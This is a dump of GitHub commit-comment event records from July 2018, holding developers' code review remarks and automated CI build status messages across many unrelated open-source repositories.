{"id":"7970240130","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719361,"position":null,"line":null,"path":null,"commit_id":"25dd9d25657b57ea2ba870c15d18a7ea116faa38","created_at":"2018-07-16T12:05:20Z","updated_at":"2018-07-16T12:05:20Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 532](https://ci.hashicorp.engineering/viewLog.html?buildId=104086&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:33"}},"created_at":"2018-07-16T12:05:20Z"}
{"id":"7970240955","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719368,"position":57,"line":61,"path":"app/views.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T12:05:31Z","updated_at":"2018-07-16T12:05:31Z","author_association":"NONE","body":"это все можно вынести в forms.py"}},"created_at":"2018-07-16T12:05:31Z"}
{"id":"7970242435","type":"CommitCommentEvent","actor":{"login":"majekolaitan"},"repo":{"name":"majekolaitan/Robotfriends"},"payload":{"comment":{"id":29719376,"position":null,"line":null,"path":null,"commit_id":"b69d5029d83a51ff776560df7039bba7e40c69a0","created_at":"2018-07-16T12:05:53Z","updated_at":"2018-07-16T12:05:53Z","author_association":"OWNER","body":"161. Building A React App 3 -> 11:40"}},"created_at":"2018-07-16T12:05:53Z"}
{"id":"7970244116","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719378,"position":null,"line":null,"path":null,"commit_id":"bb8bb5901e8410961750aa3b9794f3a16d4d643f","created_at":"2018-07-16T12:06:15Z","updated_at":"2018-07-16T12:06:15Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 533](https://ci.hashicorp.engineering/viewLog.html?buildId=104087&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T12:06:15Z"}
{"id":"7970245917","type":"CommitCommentEvent","actor":{"login":"mbabker"},"repo":{"name":"joomla/joomla-cms"},"payload":{"comment":{"id":29719380,"position":95,"line":168,"path":"libraries/src/Session/MetadataManager.php","commit_id":"6bc07106cdb153b91f7d56ebf71d40f04c9fb25c","created_at":"2018-07-16T12:06:39Z","updated_at":"2018-07-16T12:06:39Z","author_association":"MEMBER","body":"One of these days we REALLY should store numeric data as a numeric data type... https://github.com/joomla/joomla-cms/commit/edec48728d15bcc1187fe70ffa6c7464aca6fb49"}},"created_at":"2018-07-16T12:06:39Z"}
{"id":"7970246205","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719384,"position":null,"line":null,"path":null,"commit_id":"bb8bb5901e8410961750aa3b9794f3a16d4d643f","created_at":"2018-07-16T12:06:43Z","updated_at":"2018-07-16T12:06:43Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 533](https://ci.hashicorp.engineering/viewLog.html?buildId=104087&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 (new) Build time: 00:00:28"}},"created_at":"2018-07-16T12:06:43Z"}
{"id":"7970246970","type":"CommitCommentEvent","actor":{"login":"nafisaISRAIL"},"repo":{"name":"Fray23/freelans"},"payload":{"comment":{"id":29719385,"position":68,"line":69,"path":"app/views.py","commit_id":"25c2ec98efa8275c6334a0948f897a56a6a4a152","created_at":"2018-07-16T12:06:54Z","updated_at":"2018-07-16T12:06:54Z","author_association":"NONE","body":"в репозитории можно добавить .gitignore и добавить .pyc файлы в этот документ, и базу данных"}},"created_at":"2018-07-16T12:06:54Z"}
{"id":"7970248219","type":"CommitCommentEvent","actor":{"login":"martinpitt"},"repo":{"name":"sabbaka/cockpit"},"payload":{"comment":{"id":29719388,"position":25,"line":246,"path":"test/verify/check-storage-luks","commit_id":"33872af37da601cac27f1003ae85d3e4904adcf3","created_at":"2018-07-16T12:07:13Z","updated_at":"2018-07-16T12:07:13Z","author_association":"NONE","body":"This seems to be the new thing, i. e. changing the passphrase through the \"Key slots\" panel. But again, `testLuks` already checks changing the passphrase too, except in a different place. Why do we have two different ways to change it?"}},"created_at":"2018-07-16T12:07:13Z"}
{"id":"7970249408","type":"CommitCommentEvent","actor":{"login":"nikramakrishnan"},"repo":{"name":"nikramakrishnan/freetype-docwriter"},"payload":{"comment":{"id":29719391,"position":null,"line":null,"path":null,"commit_id":"640159ae23de31df5e22c1b1f62cbaeaf0249d05","created_at":"2018-07-16T12:07:29Z","updated_at":"2018-07-16T12:07:29Z","author_association":"OWNER","body":"Take a look at this diff:\r\n\r\n```diff\r\n--- before/content.py\r\n+++ after/content.py\r\n@@ -12,10 +12,8 @@\r\n #  this file you indicate that you have read the license and\r\n #  understand and accept it fully.\r\n\r\n-\"\"\"\r\n-This module contains routines to parse documentation comment blocks,\r\n-building more structured objects out of them.\r\n-\"\"\"\r\n+\"\"\"This module contains routines to parse documentation comment blocks,\r\n+building more structured objects out of them.\"\"\"\r\n\r\n from __future__ import print_function\r\n\r\n@@ -466,7 +464,7 @@\r\n\r\n     def  process_content( self, content ):\r\n         \"\"\"Process a block content and return a list of DocMarkup objects\r\n-           corresponding to it.\"\"\"\r\n+        corresponding to it.\"\"\"\r\n         first        = 1\r\n\r\n         margin  = -1\r\n```\r\n\r\n```diff\r\n--- before/docwriter.py\r\n+++ after/docwriter.py\r\n@@ -23,10 +23,8 @@\r\n # matching and substitution to speed up operation significantly.\r\n #\r\n\r\n-\"\"\"\r\n-This libaray is used to Convert source code markup to Markdown\r\n-documentation.\r\n-\"\"\"\r\n+\"\"\"This libaray is used to Convert source code markup to Markdown\r\n+documentation.\"\"\"\r\n\r\n from __future__ import print_function\r\n```\r\n\r\nI think the current formatting looks better. What do you think?"}},"created_at":"2018-07-16T12:07:29Z"}
{"id":"7970249989","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719394,"position":null,"line":null,"path":null,"commit_id":"938a8225b6b7fa5ea7ddb74ff786c344bc1a05e5","created_at":"2018-07-16T12:07:37Z","updated_at":"2018-07-16T12:07:37Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 534](https://ci.hashicorp.engineering/viewLog.html?buildId=104088&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T12:07:37Z"}
{"id":"7970250337","type":"CommitCommentEvent","actor":{"login":"harish7042"},"repo":{"name":"Paytm-Payments/Paytm_Android_App_Kit"},"payload":{"comment":{"id":29719397,"position":null,"line":null,"path":null,"commit_id":"7b3027f1533d039d4a4ac2bd6c059cfe03232dfb","created_at":"2018-07-16T12:07:41Z","updated_at":"2018-07-16T12:07:41Z","author_association":"NONE","body":"paytm sdk is missing"}},"created_at":"2018-07-16T12:07:41Z"}
{"id":"7970250846","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719400,"position":null,"line":null,"path":null,"commit_id":"938a8225b6b7fa5ea7ddb74ff786c344bc1a05e5","created_at":"2018-07-16T12:07:49Z","updated_at":"2018-07-16T12:07:49Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 534](https://ci.hashicorp.engineering/viewLog.html?buildId=104088&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:12"}},"created_at":"2018-07-16T12:07:49Z"}
{"id":"7970250864","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719401,"position":null,"line":null,"path":null,"commit_id":"938a8225b6b7fa5ea7ddb74ff786c344bc1a05e5","created_at":"2018-07-16T12:07:49Z","updated_at":"2018-07-16T12:07:49Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 535](https://ci.hashicorp.engineering/viewLog.html?buildId=104089&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T12:07:49Z"}
{"id":"7970251572","type":"CommitCommentEvent","actor":{"login":"martinpitt"},"repo":{"name":"sabbaka/cockpit"},"payload":{"comment":{"id":29719404,"position":35,"line":256,"path":"test/verify/check-storage-luks","commit_id":"33872af37da601cac27f1003ae85d3e4904adcf3","created_at":"2018-07-16T12:08:00Z","updated_at":"2018-07-16T12:08:00Z","author_association":"NONE","body":"This just checks that the dialog accepts some values, but does not assert that it actually works -- i. e. the test should now check that the device can *not* be unlocked any more with the old passphrase, but the new one works."}},"created_at":"2018-07-16T12:08:00Z"}
{"id":"7970251693","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719405,"position":null,"line":null,"path":null,"commit_id":"938a8225b6b7fa5ea7ddb74ff786c344bc1a05e5","created_at":"2018-07-16T12:08:02Z","updated_at":"2018-07-16T12:08:02Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 535](https://ci.hashicorp.engineering/viewLog.html?buildId=104089&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **SUCCESS**\nSummary: Running Build time: 00:00:12"}},"created_at":"2018-07-16T12:08:02Z"}
{"id":"7970253740","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719408,"position":81,"line":81,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T12:08:30Z","updated_at":"2018-07-16T12:08:30Z","author_association":"NONE","body":"A cheaper way to include `require(game.alpha.id != msg.sender` would be:\r\n\r\n```solidity\r\naddress alphaId = game.alpha.id;\r\nif (alphaId == address(0)) {\r\n} else if (alphaId == msg.sender) {\r\n    revert(); // And you can remove line 68\r\n} else if (game.omega.id == 0) {\r\n    ....\r\n} else {\r\n    revert(); And you can remove the line 69\r\n}\r\n```\r\n"}},"created_at":"2018-07-16T12:08:30Z"}
{"id":"7970255772","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719412,"position":null,"line":null,"path":null,"commit_id":"a0a959b6ecb18e367c37847d7628ece663881c80","created_at":"2018-07-16T12:08:59Z","updated_at":"2018-07-16T12:08:59Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 536](https://ci.hashicorp.engineering/viewLog.html?buildId=104090&buildTypeId=SolutionEngineering_PackerTemplates) is now running\n"}},"created_at":"2018-07-16T12:08:59Z"}
{"id":"7970257163","type":"CommitCommentEvent","actor":{"login":"udalov"},"repo":{"name":"JetBrains/kotlin"},"payload":{"comment":{"id":29719417,"position":16,"line":19,"path":"compiler/testData/codegen/box/reflection/properties/boundJvmFieldInInterfaceCompanion.kt","commit_id":"ebdedc965dcbf903346da363d870464785ad65d5","created_at":"2018-07-16T12:09:17Z","updated_at":"2018-07-16T12:09:17Z","author_association":"MEMBER","body":"`KProperty.get` on a property reference doesn't use reflection, it's compiled to a simple invokevirtual.\r\n\r\nSo please either remove `WITH_REFLECT` and move this test to `callableReference/bound`, or use `call` instead of `get`"}},"created_at":"2018-07-16T12:09:17Z"}
{"id":"7970257655","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719418,"position":60,"line":60,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T12:09:24Z","updated_at":"2018-07-16T12:09:24Z","author_association":"NONE","body":"You could make this function `payable` and take into account what is being topped up here."}},"created_at":"2018-07-16T12:09:24Z"}
{"id":"7970257857","type":"CommitCommentEvent","actor":{"login":"bensojona"},"repo":{"name":"hashicorp/guides-configuration"},"payload":{"comment":{"id":29719419,"position":null,"line":null,"path":null,"commit_id":"a0a959b6ecb18e367c37847d7628ece663881c80","created_at":"2018-07-16T12:09:27Z","updated_at":"2018-07-16T12:09:27Z","author_association":"CONTRIBUTOR","body":"TeamCity Solution Engineering / Packer Templates [Build 536](https://ci.hashicorp.engineering/viewLog.html?buildId=104090&buildTypeId=SolutionEngineering_PackerTemplates) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:26"}},"created_at":"2018-07-16T12:09:27Z"}
{"id":"7970258563","type":"CommitCommentEvent","actor":{"login":"Conan-Kudo"},"repo":{"name":"openSUSE/libsolv"},"payload":{"comment":{"id":29719420,"position":null,"line":null,"path":null,"commit_id":"9b3e5ec64d775dbda5dbafec00274f92b7bd640e","created_at":"2018-07-16T12:09:37Z","updated_at":"2018-07-16T12:09:37Z","author_association":"MEMBER","body":"🙁"}},"created_at":"2018-07-16T12:09:37Z"}
{"id":"7970262814","type":"CommitCommentEvent","actor":{"login":"raju1996"},"repo":{"name":"shashi9748/blogs"},"payload":{"comment":{"id":29719429,"position":null,"line":null,"path":null,"commit_id":"6104cc76e6df6b9b64f6ad5a1d30cd18f884e957","created_at":"2018-07-16T12:10:35Z","updated_at":"2018-07-16T12:10:35Z","author_association":"COLLABORATOR","body":"joydev"}},"created_at":"2018-07-16T12:10:35Z"}
{"id":"7970266899","type":"CommitCommentEvent","actor":{"login":"gfidente"},"repo":{"name":"ceph/ceph-ansible"},"payload":{"comment":{"id":29719436,"position":5,"line":24,"path":"roles/ceph-mds/tasks/create_mds_filesystems.yml","commit_id":"d6f265f51d0752cd32daf2cb4c42d3338f72d9f3","created_at":"2018-07-16T12:11:32Z","updated_at":"2018-07-16T12:11:32Z","author_association":"CONTRIBUTOR","body":"sorry guys I noticed this late, I understand it is not at all a blocking issue but should the tag really match the value of {{ cephfs }} (and as such, change if people customizes the filesystem name), or just default to the 'cephfs' string?"}},"created_at":"2018-07-16T12:11:32Z"}
{"id":"7970272410","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719456,"position":111,"line":111,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T12:12:47Z","updated_at":"2018-07-16T12:12:47Z","author_association":"NONE","body":"I would have done that in `joinGame`. After all, you could have a `commitMove` transaction that failed because of out of gas, but it does not mean that humans do not know. They know because the `commitMove` tx is on the ledger."}},"created_at":"2018-07-16T12:12:47Z"}
{"id":"7970273374","type":"CommitCommentEvent","actor":{"login":"Ativelox"},"repo":{"name":"SoPra18-07/Singularity"},"payload":{"comment":{"id":29719458,"position":null,"line":null,"path":null,"commit_id":"95eb01d4d1bf3069c7761805f71bd57c2c8f0caa","created_at":"2018-07-16T12:12:59Z","updated_at":"2018-07-16T12:12:59Z","author_association":"CONTRIBUTOR","body":"yeah that should do the trick"}},"created_at":"2018-07-16T12:12:59Z"}
{"id":"7970275709","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29719461,"position":10,"line":7,"path":"src/Orders.js","commit_id":"53de9d12d20149932b3bfd024ae9dca81e527d9f","created_at":"2018-07-16T12:13:27Z","updated_at":"2018-07-16T12:13:27Z","author_association":"COLLABORATOR","body":"O `table` é para usar em conjunto do `TodoList`, que renderiza o `checkbox`, a descrição do `Todo` e do botão de exclusão. Pesquise por `thead` e `tbody`, eles devem ser usados em conjunto nesse cenário."}},"created_at":"2018-07-16T12:13:27Z"}
{"id":"7970277193","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719464,"position":138,"line":138,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T12:13:47Z","updated_at":"2018-07-16T12:13:47Z","author_association":"NONE","body":"Yep"}},"created_at":"2018-07-16T12:13:47Z"}
{"id":"7970279910","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29719469,"position":141,"line":141,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-16T12:14:25Z","updated_at":"2018-07-16T12:14:25Z","author_association":"NONE","body":"Here too, how do you protect from a rainbow attack?\r\nIf 2 such contracts are deployed, they both create the same hashes."}},"created_at":"2018-07-16T12:14:25Z"}
{"id":"7970282572","type":"CommitCommentEvent","actor":{"login":"elifaln"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29719479,"position":7,"line":964,"path":"lib/main_common.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T12:15:01Z","updated_at":"2018-07-16T12:15:01Z","author_association":"NONE","body":"$testset_s390_$tc -> maybe without the \"s390\" because some test cases called \"KERNEL_LSCPU_CHCPU\", \"MEMORY_chmem\" so without s390"}},"created_at":"2018-07-16T12:15:01Z"}
{"id":"7970284905","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29719485,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-16T12:15:33Z","updated_at":"2018-07-16T12:15:33Z","author_association":"MEMBER","body":"@Hains @MastaG \r\nThese are the required changes for PLi's Makefile: https://github.com/PLi-metas/pli-extras/commit/7b99ad005e9bafbed10d79a4d4df51b1e966ccd6#diff-e61692fabc598c2a0cd05920a04ba97c\r\n\r\nMaybe we can do it via shell script later ...\r\n\r\nI just wanted to "}},"created_at":"2018-07-16T12:15:33Z"}
{"id":"7970287155","type":"CommitCommentEvent","actor":{"login":"marscher"},"repo":{"name":"markovmodel/pyemma_tutorials"},"payload":{"comment":{"id":29719489,"position":null,"line":null,"path":null,"commit_id":"460270e57373a65524a37a6242014d505c0f766b","created_at":"2018-07-16T12:16:02Z","updated_at":"2018-07-16T12:16:02Z","author_association":"MEMBER","body":"please use [ci skip] tag for such commits."}},"created_at":"2018-07-16T12:16:02Z"}
{"id":"7970287415","type":"CommitCommentEvent","actor":{"login":"aman313"},"repo":{"name":"allenai/allennlp"},"payload":{"comment":{"id":29719490,"position":31,"line":169,"path":"allennlp/commands/fine_tune.py","commit_id":"0312b16e23263d24401d7d89b8c327fa0b7259c3","created_at":"2018-07-16T12:16:06Z","updated_at":"2018-07-16T12:16:06Z","author_association":"NONE","body":"@HarshTrivedi Hi Harsh. Thanks for this useful addition to the fine-tune command. I am a facing an issue here  and am wondering if I am doing something wrong. If I understand this correctly, the extend_from_instances extends the vocab here. But the text_field_embedder in the model has already been initialized from the archive. Hence I am getting an index out of bound error when the model tries to do a forward on a token that has been added to the vocab by extension. I am wondering if you have faced this issue or am I missing something? If not, I am not quite sure how to propagate these changes to the embedder such that \"new\" embeddings get trained while leaving the older ones as-is. Any suggestions will be most welcome. Thanks."}},"created_at":"2018-07-16T12:16:06Z"}
{"id":"7970288688","type":"CommitCommentEvent","actor":{"login":"JoakimLarsson"},"repo":{"name":"mamedev/mame"},"payload":{"comment":{"id":29719492,"position":32,"line":2669,"path":"src/devices/machine/z80scc.cpp","commit_id":"44bc4d6bc32cffe6c4bea8b5f148b7663b62c781","created_at":"2018-07-16T12:16:22Z","updated_at":"2018-07-16T12:16:22Z","author_association":"CONTRIBUTOR","body":"Great you figured it out, I was pretty sure I read up on that piece of code but obviously it was incomplete. :)"}},"created_at":"2018-07-16T12:16:22Z"}
{"id":"7970290449","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29719498,"position":5,"line":5,"path":"contracts/GamePlayers.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-16T12:16:46Z","updated_at":"2018-07-16T12:16:46Z","author_association":"NONE","body":"You separated this `balances` into a parent contract, I think to protect it. How about you make it `private`? Of course, you need to update a few things."}},"created_at":"2018-07-16T12:16:46Z"}
{"id":"7970291204","type":"CommitCommentEvent","actor":{"login":"geekdevs"},"repo":{"name":"TheBigBrainsCompany/TbbcMoneyBundle"},"payload":{"comment":{"id":29719501,"position":null,"line":null,"path":null,"commit_id":"417a94d111d97feb5453e02c5c92b575e9c41381","created_at":"2018-07-16T12:16:56Z","updated_at":"2018-07-16T12:16:56Z","author_association":"COLLABORATOR","body":"@igneus I believe there's some misunderstanding.  Version `3.1.4` also uses moneyphp `v1.2.1`.\r\nAnd version `3.1.5` was live for like 30 minutes (I doubt you built your project on top of that ;)).\r\nIf you require moneyphp v3 you probably depend on master and not on 3.x branch.\r\n"}},"created_at":"2018-07-16T12:16:56Z"}
{"id":"7970292240","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"codespell-project/codespell"},"payload":{"comment":{"id":29719503,"position":13,"line":3053,"path":"codespell_lib/data/dictionary.txt","commit_id":"0ec7a72bc46d6166cfcf6d676a106cc02b7faa5a","created_at":"2018-07-16T12:17:10Z","updated_at":"2018-07-16T12:17:10Z","author_association":"MEMBER","body":"it is a way of saying \"this is probably a misspelling but could technically be correct\""}},"created_at":"2018-07-16T12:17:10Z"}
{"id":"7970292590","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/RockPaperScissors"},"payload":{"comment":{"id":29719505,"position":15,"line":15,"path":"contracts/GamePlayers.sol","commit_id":"60e023e82e3c852b1ee309bcaa47a900a5111241","created_at":"2018-07-16T12:17:15Z","updated_at":"2018-07-16T12:17:15Z","author_association":"NONE","body":"Have a look at `SafeMath` library and prevent a very hypothetical `uint` wrap around."}},"created_at":"2018-07-16T12:17:15Z"}
{"id":"7970292591","type":"CommitCommentEvent","actor":{"login":"gtkatakura-bysoft"},"repo":{"name":"jasonrobson/todolist"},"payload":{"comment":{"id":29719504,"position":21,"line":39,"path":"src/Todolist.js","commit_id":"6e9b8c2eae3fcfd6f0b79c166915f5a2c1e334ec","created_at":"2018-07-16T12:17:15Z","updated_at":"2018-07-16T12:17:15Z","author_association":"COLLABORATOR","body":"O botão está grande demais, ajuste o tamanho.\r\n\r\n![captura de tela 2018-07-16 as 09 14 10](https://user-images.githubusercontent.com/16100409/42758168-f7a09a54-88d8-11e8-9e68-b67dffa1f1f1.png)"}},"created_at":"2018-07-16T12:17:15Z"}
{"id":"7970292931","type":"CommitCommentEvent","actor":{"login":"Soulofdestiny"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29719506,"position":7,"line":964,"path":"lib/main_common.pm","commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-16T12:17:19Z","updated_at":"2018-07-16T12:17:19Z","author_association":"OWNER","body":"@elifaln that would also work\r\n"}},"created_at":"2018-07-16T12:17:19Z"}
{"id":"7970293813","type":"CommitCommentEvent","actor":{"login":"EmilioJeldes"},"repo":{"name":"EmilioJeldes/biblioteca"},"payload":{"comment":{"id":29719508,"position":null,"line":null,"path":null,"commit_id":"7c03001b9f44d3758004a638d6fdc3ea0262f5cb","created_at":"2018-07-16T12:17:31Z","updated_at":"2018-07-16T12:17:31Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gestionar Recurso y Sub-entidades (libro-revista-diario)](https://trello.com/c/yRZ7ZkPm/19-gestionar-recurso-y-sub-entidades-libro-revista-diario)"}},"created_at":"2018-07-16T12:17:31Z"}
{"id":"7970296743","type":"CommitCommentEvent","actor":{"login":"nazar-pc"},"repo":{"name":"aeternity/noise-c.wasm"},"payload":{"comment":{"id":29719516,"position":null,"line":null,"path":null,"commit_id":"9e823af5b08a6a1fe2c9e47e46c4b6bb0e0570ab","created_at":"2018-07-16T12:18:10Z","updated_at":"2018-07-16T12:18:10Z","author_association":"NONE","body":"By default this package tries to fetch `noise-c.wasm` from the same directory where JavaScript file is located unless you move JavaScript's file source code somewhere so that it runs asynchronously (in which case it will not have access to `document.currentScript`, which might be the reason you have this issue).\r\n\r\nI've be thinking about this already and will try to come up with a way to solve this upstream."}},"created_at":"2018-07-16T12:18:10Z"}
{"id":"7970300401","type":"CommitCommentEvent","actor":{"login":"The-Abhishek"},"repo":{"name":"The-Abhishek/Twitter-sentimental-Analysis"},"payload":{"comment":{"id":29719522,"position":null,"line":null,"path":null,"commit_id":"69b160a856446f4e2b746049d6094d4abe6ee222","created_at":"2018-07-16T12:18:58Z","updated_at":"2018-07-16T12:18:58Z","author_association":"OWNER","body":"This is the twitter raw data for a keyword 'obama'."}},"created_at":"2018-07-16T12:18:58Z"}
{"id":"7970302432","type":"CommitCommentEvent","actor":{"login":"jorrit"},"repo":{"name":"mikeedwards83/Glass.Mapper"},"payload":{"comment":{"id":29719525,"position":5,"line":641,"path":"Source/Glass.Mapper.Sc/GlassHtml.cs","commit_id":"52338bde98e6c9444ad6e3238956cabdbbe58d5e","created_at":"2018-07-16T12:19:26Z","updated_at":"2018-07-16T12:19:26Z","author_association":"NONE","body":"This change causes a build failure because `dictionary[RenderParameterKeys.DisableWebEdit]` is a string and it is used as a bool."}},"created_at":"2018-07-16T12:19:26Z"}
{"id":"7970311096","type":"CommitCommentEvent","actor":{"login":"jens1o"},"repo":{"name":"eamodio/vscode-gitlens"},"payload":{"comment":{"id":29719558,"position":5,"line":118,"path":"src/git/shell.ts","commit_id":"f8e287615fb75150e2bc1750a6a216a91ef1b20a","created_at":"2018-07-16T12:21:18Z","updated_at":"2018-07-16T12:21:18Z","author_association":"NONE","body":"You need to update the documenation of the `readonly maxBuffer?: number;` property, too :)"}},"created_at":"2018-07-16T12:21:18Z"}
{"id":"7970313673","type":"CommitCommentEvent","actor":{"login":"vovapasko"},"repo":{"name":"vovapasko/Crypto_fuignya"},"payload":{"comment":{"id":29719570,"position":34,"line":25,"path":"DBConnector.py","commit_id":"bb9ff2d8662a9c5d164d65fb3a01cb153a35be7c","created_at":"2018-07-16T12:21:53Z","updated_at":"2018-07-16T12:21:53Z","author_association":"OWNER","body":"Why do you use this method? Is it important for using Singleton or what?"}},"created_at":"2018-07-16T12:21:53Z"}
{"id":"7970315604","type":"CommitCommentEvent","actor":{"login":"nupur-batra"},"repo":{"name":"nupur-batra/sample_project"},"payload":{"comment":{"id":29719572,"position":5,"line":12,"path":"config/Migrations/20180712133319_Initial.php","commit_id":"44a9e6bfed9668518d0c0d84f8ac0350a6c9af32","created_at":"2018-07-16T12:22:17Z","updated_at":"2018-07-16T12:22:17Z","author_association":"OWNER","body":"- At that moment whatever came into my mind, ikept the name of table.sorry if you didn't find the table name 'form_details' appropriate.\r\n-I didn't renamed my file.I was facing one issuse so i regenareted my migration file by the following command:\r\n\"bin/cake.php bake migration_snapshot Initial\".\r\n"}},"created_at":"2018-07-16T12:22:17Z"}
{"id":"7970315834","type":"CommitCommentEvent","actor":{"login":"joynal061214"},"repo":{"name":"joynal061214/Testing-Repos"},"payload":{"comment":{"id":29719574,"position":null,"line":null,"path":null,"commit_id":"b91f46057980e91402194442b185e5c3185af22a","created_at":"2018-07-16T12:22:21Z","updated_at":"2018-07-16T12:22:21Z","author_association":"OWNER","body":"cleaning"}},"created_at":"2018-07-16T12:22:21Z"}
{"id":"7970316001","type":"CommitCommentEvent","actor":{"login":"larsoner"},"repo":{"name":"agramfort/mne-python"},"payload":{"comment":{"id":29719575,"position":273,"line":1341,"path":"mne/morph.py","commit_id":"ed3f15735d7966010356e568fc3691788b81a660","created_at":"2018-07-16T12:22:23Z","updated_at":"2018-07-16T12:22:23Z","author_association":"COLLABORATOR","body":"-1 on adding back the \"non-precomputed\". IIRC it non-precomputed is almost always slower (i.e., after a few time points); when it isn't, the difference is small; when it is, the difference can be huge (but feel free to check). So I don't really see the point in having that method anymore. We will have cleaner code by precomputing everything once and then just applying (after sanity checking). Plus if we want non-precomputed mode, we should really add it for volume spaces, which should be discouraged based on how long they take."}},"created_at":"2018-07-16T12:22:23Z"}
{"id":"7970316496","type":"CommitCommentEvent","actor":{"login":"AMMHasan"},"repo":{"name":"AMMHasan/test"},"payload":{"comment":{"id":29719577,"position":null,"line":null,"path":null,"commit_id":"77dda0f8e8257f98c6bdb15ee3bb4863e440cb43","created_at":"2018-07-16T12:22:29Z","updated_at":"2018-07-16T12:22:29Z","author_association":"OWNER","body":"fixes #4"}},"created_at":"2018-07-16T12:22:29Z"}
{"id":"7970317040","type":"CommitCommentEvent","actor":{"login":"cklb"},"repo":{"name":"cklb/pymoskito"},"payload":{"comment":{"id":29719578,"position":103,"line":645,"path":"pymoskito/simulation_gui.py","commit_id":"f294510bb2fba5f6da0f4a1ddcd71995e34cb34d","created_at":"2018-07-16T12:22:36Z","updated_at":"2018-07-16T12:22:36Z","author_association":"OWNER","body":"`self.currentDataset = self._lastSimulations[idx]` ?"}},"created_at":"2018-07-16T12:22:36Z"}
